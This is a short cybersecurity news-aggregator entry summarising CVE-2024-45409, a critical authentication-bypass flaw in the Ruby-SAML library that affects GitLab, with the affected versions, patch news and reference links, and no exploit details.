FlagThis

CyberSecurity updates
Updated: 2024-10-22 05:25:43 Pacfic
about.gitlab.com
Exploiting SAML Vulnerability CVE-2024-45409 in GitLab and Ruby-SAML - 6d

Read more: about.gitlab.com

A critical vulnerability, CVE-2024-45409, affecting the Ruby-SAML library, allows attackers to forge SAML responses and bypass authentication. The vulnerability stems from an incorrect XPath selector that prevents proper verification of the SAML response signature. This flaw impacts Ruby-SAML versions up to 1.12.2 and between 1.13.0 and 1.16.0. Attackers can exploit the vulnerability by crafting a SAML Response or Assertion that bypasses authentication and potentially gain unauthorized access to sensitive data and critical systems. GitLab was impacted by the vulnerability, and the company issued an important security update to address it.

References:
  • Over Security - Cyble researchers have identified active exploitation attempts of the vulnerability in GitLab accounts. - 6d
  • about.gitlab.com - GitLab released a patch to address the vulnerability in multiple versions of GitLab Community Edition (CE) and Enterprise Edition (EE). - 6d
  • github.com - The vulnerability was identified by ahacker1 of SecureSAML, a well-known security researcher. - 6d
  • blog.projectdiscovery.io - Ruby SAML - GitLab Authentication Bypass - 6d
  • about.gitlab.com - Active Exploitation of SAML Vulnerability CVE-2024-45409 Detected by Cyble Sensors - 6d

Classification:
  • HashTags: SAML Vulnerability GitLab
  • Company: GitLab
  • Target: GitLab accounts
  • Product: Ruby-SAML
  • Feature: SAML Response Signature Verifi
  • Type: Vulnerability
  • Severity: Critical

This site is an experimental news aggregator using feeds I personally follow. You can reach me using contacts documented at my website here (https://royans.net/) if you have feedback. You can also find Flathis at Mastodon.